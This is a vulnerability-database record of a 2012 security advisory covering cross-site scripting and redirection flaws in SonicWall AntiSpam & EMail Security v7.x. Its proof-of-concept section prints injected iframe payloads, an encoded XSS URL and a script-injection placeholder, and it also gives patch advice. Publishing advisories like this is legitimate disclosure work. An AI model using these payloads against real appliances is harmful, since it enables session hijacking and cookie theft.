DATABASE RESOURCES PRICING ABOUT US

{"id": "VULNERABLE:58", "vendorId": null, "type": "vulnerlab", "bulletinFamily": "exploit", "title": "SonicWall AntiSpam & EMail v7.x - Multiple Vulnerabilities", "description": "", "published": "2012-01-07T00:00:00", "modified": "2012-01-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.vulnerability-lab.com/get_content.php?id=58", "reporter": "Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-12-20T08:03:48", "viewCount": 2, "enchantments": {"dependencies": {}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "sourceData": "Document Title:\r\n===============\r\nSonicWall AntiSpam & EMail v7.x - Multiple Vulnerabilities\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttp://www.vulnerability-lab.com/get_content.php?id=58\r\n\r\n\r\nRelease Date:\r\n=============\r\n2012-01-07\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n58\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nSpam-, Phishing- und mit Viren infizierte Nachrichten verursachen in Unternehmen weltweit weiterhin gro\u00dfe Sch\u00e4den. \r\nDie Kosten, die durch Produktivit\u00e4tseinbu\u00dfen, gestohlene Benutzeridentit\u00e4ten und den Missbrauch vertraulicher Daten \r\nentstehen, k\u00f6nnen astronomische H\u00f6hen erreichen. SonicWALL\u00ae Email Security (SES)-Appliances, -Software und -Dienste \r\nstellen eine breite Palette an Anti Spam- und E Mail-Sicherheitsl\u00f6sungen bereit, die den Sicherheitsanforderungen von \r\nEinzelpersonen und von Unternehmen mit 100.000 Mitarbeitern gleicherma\u00dfen gerecht werden. SonicWALL sorgt daf\u00fcr, dass \r\nSie und Ihr Unternehmen E Mail sicher, produktiv und kosteneffizient nutzen k\u00f6nnen\r\n\r\n(Copy of the Vendor Homepage: http://www.sonicwall.com/de/Email_Security.html)\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nVulnerability-Lab Team discovered multiple Web Vulnerabilities on SonicWalls AntiSpam & EMail Security Appliance Application v7.x.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2012-01-07:\tPublic or Non-Public Disclosure\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nDELL SonicWall\r\nProduct: AntiSpam & EMail Security Appliance Application 7.3.1 & older versions\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nHigh\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\n1.1\r\nA persistent input validation vulnerability is detected on SonicWalls AntiSpam & EMail Security Appliance Application v7.3.x.\r\nRemote attackers or low privileged user accounts can manipulate specific application requests via persistent script code inject\r\n& low required user inter action. Successful exploitation can result in session hijacking, persistent context manipulation, application-side phishing.\r\n\r\nVulnerable Module(s):\t\r\n\t\t\t\t [+] MGMTUser Delegate\r\n\r\n\r\n1.2\r\nA non-persistent input validation vulnerability is detected on SonicWalls AntiSpam & EMail Security Appliance Application.\r\nRemote attackers can force via high required user inter action client-side requests to steal session data(cookies).\r\n\r\nVulnerable Module(s):\t\r\n\t\t\t\t [+] MTA Queue Report\r\n\r\nPicture(s):\r\n\t\t\t\t ../ive1.png\r\n\r\n1.3\r\nA redirection vulnerability is detected on SonicWalls AntiSpam & EMail Security Appliance Application.\r\nThe vulnerability allows an attacker to implement a malicious extern website into the panel website. The redirect is exploitable via direction value.\r\n\r\nVulnerable Module(s):\t\r\n\t\t\t\t [+] User Mail View\r\n\r\nPicture(s):\r\n\t\t\t\t ../redirect.png\r\n\r\nAffected Version(s):\r\nSonicWall AntiSpam & EMail Security Appliance Application - v7.3.x or v7.3.4.5725 & older versions\r\nTypus: AntiSpam & EMail Security Appliance; Comphresive Box; Unified Threat Management Appliance\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThis vulnerabilities can be exploited by local or remote attackers. For demonstration or reproduce ...\r\n\r\n1.1\r\nCode Review(mgmtuser_message.html): Input Validation Vulnerability (Persistent)\r\n<tr valign=\"top\">\r\n<td valign=\"middle\"> <input type=\"radio\" name=\"dispositionJunk\" value=\"tag\" checked=\"checked\" onclick=\"javascript:document.forms[0].prefixJunk.focus;\">\r\n</td><td valign=\"middle\">Tag with\u00a0<input type=\"text\" name=\"prefixJunk\" size=\"10\" value=\">\"<iframe src=http://test.de>\" \r\nonchange=\"javascript:document.forms[0].dispositionJunk[2].checked=true;\">\u00a0added to the subject</td>\r\n</tr></table><BR></td></tr><tr bgcolor=\"#FFFFFF\"><td valign=\"top\"><b>Action for messages marked as\u00a0<font color=\"#990000\">Likely Spam</font>:</b></td>\r\n<td valign=\"top\"><table width=\"100%\" border=\"0\" cellspacing=\"1\" cellpadding=\"1\"><tr><td width=\"15\"> <input type=\"radio\" name=\"dispositionMaybe\" value=\"none\">\r\n</td><td>Likely Spam blocking off (deliver messages to recipients)</td></tr><tr><td> <input type=\"radio\" name=\"dispositionMaybe\" value=\"quarantine\"></td>\r\n<td>Store in Junk Box and delete after\u00a0<b>45 days.</b></td></tr><tr>\r\n<td> <input type=\"radio\" name=\"dispositionMaybe\" value=\"tag\" checked=\"checked\" onclick=\"javascript:document.forms[0].prefixMaybe.focus;\">\r\n</td><td>Tag with\u00a0<input type=\"text\" name=\"prefixMaybe\" size=\"10\" value=\">\"<iframe src=http://test.de>\" \r\nonchange=\"javascript:document.forms[0].dispositionMaybe[2].checked=true;\">\u00a0added to the subject</td></tr></table>\r\n\r\n\r\nReference(URL):\r\n\t\t\t\t\thttp://xxx.xxx.com/mgmtuser_delegate.htm\r\n\r\n\r\n1.2\r\n\r\nBUG:\tIVE - Non Persistent\r\nURL:\thttp://demo.xxx.com/reports_mta_queue_status.html?hostname=greenland%22%3E%3C*\r\n\r\nBUG:\tIVE - Persistent\r\nURL:\thttp://demo.xxx.com/mgmtuser_delegate.html*>\r\n\r\nReference(URL):\r\nhttp://xxx.com/reports_mta_queue_status.html?hostname=greenland%22%3E%3C...\r\n\r\n\r\n1.3\r\nCode Review(msg_viewer_user_mail.html): Redirection Vulnerability\r\n\r\n<form name=\"msgMessageStoreViewerForm\" method=\"post\" action=\"/msg_viewer_user_mail.html\" id=\"msgMessageStoreViewerForm\">\r\n<input type=\"hidden\" id=\"messageStoreID\" name=\"messageStoreID\" value=\"shard_20100321/1473108699/JUI\"/>\r\n<input type=\"hidden\" id=\"direction\" name=\"direction\" value=\">\"<INCLUDE OWN SCRIPTCODE HERE!>/>\r\n<input type=\"hidden\" id=\"preview\" name=\"preview\" value=\"true\"/>\r\n<input type=\"hidden\" id=\"command\" name=\"command\"/>\r\n<input type=\"hidden\" id=\"recipients\" name=\"recipients\"/>\r\n<table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"15\">\r\n<tr><td><span class=\"confirmation\"></span><table width='100%' border='0' cellspacing='0' cellpadding='4'><tr><td>Processed by: greenland.cdpdemo.local\r\n\r\n\r\nReference(URL):\r\nhttp://xxx.com/msg_viewer_user_mail.html?messageStoreId=shard_20100321/256665421/JUI&direction=\r\n\r\n\r\nSolution - Fix & Patch:\r\n=======================\r\n1.1\r\nRestrict the input fields via filter or mask & parse the input/output section to patch the persistent script code injection bug.\r\n\r\n1.2\r\nParse the hostname value of the vulnerable module to fix the client side cross site scripting issue.\r\n\r\n\r\n1.3\r\nRestrict the direction request value to fix the redirection bug.\r\n\r\n\r\nSecurity Risk:\r\n==============\r\n1.1\r\nThe security risk of the persistent script code inject vulnerability is estimated as high(-).\r\n\r\n1.2\r\nThe security risk of the non-persistent vulnerabilities are estimated as medium(-).\r\n\r\n1.3\r\nThe security risk of the redirection vulnerability is estimated as low(-).\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-\r\nLab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business \r\nprofits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \r\nstates do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation \r\nmay not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases \r\nor trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t - www.vulnerability-lab.com/register\r\nContact: admin@vulnerability-lab.com \t- support@vulnerability-lab.com \t - research@vulnerability-lab.com\r\nSection: video.vulnerability-lab.com \t- forum.vulnerability-lab.com \t\t - news.vulnerability-lab.com\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t - youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and \r\nother information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), \r\nmodify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.\r\n\r\n \t\t\t\t \tCopyright \u00a9 2012 | Vulnerability Laboratory\r\n\r\n\r\n\r\n", "category": "Vendor Vulnerabilities", "_state": {"dependencies": 1646529340, "score": 1659853389, "epss": 1679174273}, "_internal": {"score_hash": "b929621098b2330f57df72028a172de1"}}

{}